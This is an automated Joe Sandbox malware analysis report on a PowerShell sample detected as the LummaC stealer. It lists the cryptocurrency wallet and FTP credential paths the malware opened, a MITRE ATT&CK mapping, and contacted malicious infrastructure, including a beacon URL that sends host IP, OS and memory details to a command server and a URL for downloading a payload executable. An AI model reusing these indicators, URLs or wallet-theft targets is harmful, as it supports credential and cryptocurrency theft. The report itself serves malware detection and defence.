Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Yara match	File source: 0000000A.00000003.2043952153.0000000000C12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6128, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6128, type: MEMORYSTR
Source: Yara match	File source: 10.3.cmd.exe.c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.cmd.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1899525334.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	13 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	12 Process Injection	4 Obfuscated Files or Information	LSASS Memory	42 System Information Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Software Packing	Security Account Manager	341 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	231 Virtualization/Sandbox Evasion	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	231 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
get_txt.ps1	8%	ReversingLabs
get_txt.ps1	13%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Temp\cmd.exe	14%	ReversingLabs	Win32.Trojan.Doina

Source	Detection	Scanner	Label
http://91.206.178.120:5001/script_end?random_number=$randomNumber	100%	Avira URL Cloud	malware
https://healthyjouprney.tech/	0%	Avira URL Cloud	safe
https://sandramosquedamx.com/wp-content/plugins/newsletter/images/gtyh.exe	100%	Avira URL Cloud	malware
https://healthyjouprney.tech/A	0%	Avira URL Cloud	safe
healthyjouprney.tech	0%	Avira URL Cloud	safe
https://healthyjouprney.tech/apig	0%	Avira URL Cloud	safe
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m	100%	Avira URL Cloud	malware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft	100%	Avira URL Cloud	malware
https://healthyjouprney.tech/apiF	0%	Avira URL Cloud	safe
https://healthyjouprney.tech/apior	0%	Avira URL Cloud	safe
https://healthyjouprney.tech/api	0%	Avira URL Cloud	safe
https://healthyjouprney.tech:443/api	0%	Avira URL Cloud	safe
https://healthyjouprney.tech/api0	0%	Avira URL Cloud	safe
http://91.206.178.120:5001/script_end?random_number=	100%	Avira URL Cloud	malware
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra	100%	Avira URL Cloud	malware
http://91.206.178.120:5001	100%	Avira URL Cloud	malware
https://healthyjouprney.tech/apiied	0%	Avira URL Cloud	safe
http://91.206.178.120:5001/script_start?ip=	100%	Avira URL Cloud	malware
http://91.206.178.120:5001/script_end?random_number=29634$M	100%	Avira URL Cloud	malware
https://sandramosquedamx.com	0%	Avira URL Cloud	safe
http://91.206.178.120:5001/script_end?random_number=29634	100%	Avira URL Cloud	malware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634	100%	Avira URL Cloud	malware
https://healthyjouprney.tech/apimeP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
healthyjouprney.tech	188.114.97.3	true	true	unknown
api.ipify.org	104.26.13.205	true	false	high
sandramosquedamx.com	35.208.212.94	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
nestlecompany.world	false		high
https://sandramosquedamx.com/wp-content/plugins/newsletter/images/gtyh.exe	true	Avira URL Cloud: malware	unknown
blast-hubs.com	false		high
healthyjouprney.tech	true	Avira URL Cloud: safe	unknown
stormlegue.com	false		high
http://api.ipify.org/	false		high
https://healthyjouprney.tech/api	true	Avira URL Cloud: safe	unknown
nestlecompany.pro	false		high
mercharena.biz	false		high
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634	true	Avira URL Cloud: malware	unknown
blastikcn.com	false		high
generalmills.pro	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high
https://duckduckgo.com/ac/?q=	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high
http://crl.microsoft	powershell.exe, 00000000.00000002.1425682486.0000000007BDA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.206.178.120:5001/script_end?random_number=$randomNumber	notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, get_txt.ps1	true	Avira URL Cloud: malware	unknown
https://healthyjouprney.tech/apiF	cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high
https://healthyjouprney.tech/A	cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://healthyjouprney.tech/	cmd.exe, 0000000A.00000002.2102253733.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2025610040.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043885038.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2041606518.0000000000C47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000000.00000002.1405953720.0000000004681000.00000004.00000800.00020000.00000000.sdmp	false		high
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://healthyjouprney.tech/apig	cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	false		high
http://x1.i.lencr.org/0	cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://healthyjouprney.tech/apior	cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://healthyjouprney.tech:443/api	cmd.exe, 0000000A.00000003.2074794526.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	cmd.exe, 0000000A.00000003.2030074239.0000000003883000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1405953720.0000000004681000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	B36A69092427CC90.dat.10.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://91.206.178.120:5001/script_end?random_number=29634$M	powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://91.206.178.120:5001/script_end?random_number=	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	false		high
http://91.206.178.120:5001/script_start?ip=	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	B36A69092427CC90.dat.10.dr	false		high
http://91.206.178.120:5001	powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.ipify.org	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497081959.000000FDFB8A9000.00000004.00000010.00020000.00000000.sdmp, get_txt.ps1	false		high
https://ac.ecosia.org/autocomplete?q=	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high
https://healthyjouprney.tech/api0	cmd.exe, 0000000A.00000002.2102253733.0000000000C23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra	powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497081959.000000FDFB8A9000.00000004.00000010.00020000.00000000.sdmp, get_txt.ps1	false	Avira URL Cloud: malware	unknown
https://healthyjouprney.tech/apiied	cmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043952153.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sandramosquedamx.com	powershell.exe, 00000000.00000002.1405953720.0000000004918000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.206.178.120:5001/script_end?random_number=29634	powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	B36A69092427CC90.dat.10.dr	false		high
https://healthyjouprney.tech/apimeP	cmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2066952978.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	healthyjouprney.tech	European Union	13335	CLOUDFLARENETUS	true
35.208.212.94	sandramosquedamx.com	United States	19527	GOOGLE-2US	true
91.206.178.120	unknown	Poland	200088	ARTNET2PL	true
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1617749
Start date and time:	2025-02-18 08:28:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	get_txt.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@5/21@3/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 57 Number of non-executed functions: 74
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4904 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:29:19	API Interceptor	54x Sleep call for process: powershell.exe modified
04:19:50	API Interceptor	18x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	PO.exe	Get hash	malicious	FormBook	Browse	www.kdjsswzx.club/9nn7/
	http://ilocation.live/ztB	Get hash	malicious	Unknown	Browse	ilocation.live/ztB
	http://case-id-1000292829236938.mashstaffing.com/	Get hash	malicious	Unknown	Browse	case-id-1000292829236938.mashstaffing.com/banner-b1482d4c.webp
	Ordine di acquisto_(PO102429)_OFT_PUMPS.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	ddrtot.shop/New/PWS/fre.php
	PO# 81136575.exe	Get hash	malicious	FormBook	Browse	www.sbualdwhryi.info/3kya/
	SHIPMENT OF THE ORIGINAL DOCUMENTS.exe	Get hash	malicious	FormBook	Browse	www.kdjsswzx.club/65bl/
	http://www.telegramus.org/	Get hash	malicious	Unknown	Browse	www.telegramus.org/cdn-cgi/rum?
	http://ctakkponmndiri.siitusressmi.web.id/	Get hash	malicious	Unknown	Browse	ctakkponmndiri.siitusressmi.web.id/favicon.png
	engine.ps1	Get hash	malicious	FormBook	Browse	www.serenityos.dev/rmwo/
	PDF SCAN COPY P.O7767.exe	Get hash	malicious	FormBook	Browse	www.actpisalnplay.cyou/oxsm/
91.206.178.120	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	91.206.178.120:5001/script_end?random_number=33884
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	91.206.178.120:5001/script_end?random_number=91530
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	91.206.178.120:5001/script_end?random_number=66350
104.26.13.205	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	R1TftmQpuQ.bat	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	SpacesVoid Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	BiXS3FRoLe.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	lEUy79aLAW.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	104.26.13.205
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	104.26.12.205
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	104.26.12.205
	SecuriteInfo.com.Win32.Evo-gen.5457.19170.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	LmIclOjfqc.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://account-5036237.kurhaus-steina.com/	Get hash	malicious	Unknown	Browse	104.26.12.205
	http://account-5078804.kurhaus-steina.com/	Get hash	malicious	Unknown	Browse	104.26.13.205
	https://business.accounts-security-center-overview.com/case	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.org	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.org	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	104.26.13.205
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	172.67.149.252
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	104.26.12.205
	Kariny CV.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	Commercial Invoice Confirmation-1132346.vbs	Get hash	malicious	Unknown	Browse	104.21.16.1
	jjmax il.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	104.22.74.216
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	172.67.74.232
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	104.18.27.193
	FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Get hash	malicious	DBatLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
CLOUDFLARENETUS	LWLwodPZiq.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	104.26.13.205
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	172.67.149.252
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	104.26.12.205
	Kariny CV.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	Commercial Invoice Confirmation-1132346.vbs	Get hash	malicious	Unknown	Browse	104.21.16.1
	jjmax il.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	104.22.74.216
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	172.67.74.232
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	104.18.27.193
GOOGLE-2US	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.207.24.140
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.207.24.140
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.207.24.140
	Payment_Activity_0079_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.207.24.140
	Payment_Activity_0079_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.214.196.202
	Payment_Activity_0079_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.207.24.140
	http://ln.run/aktivasi-tarif-Bank-BSI-id	Get hash	malicious	Unknown	Browse	35.214.168.80
	https://files.fm/f/kxnrfq5y8g?share_email_id=15e8956&share_email_skip_notify=true	Get hash	malicious	Unknown	Browse	35.219.151.53
	https://attservero.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	35.214.206.12
	res.mpsl.elf	Get hash	malicious	Unknown	Browse	35.216.220.147
ARTNET2PL	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	91.206.178.120
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	91.206.178.120
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	91.206.178.120
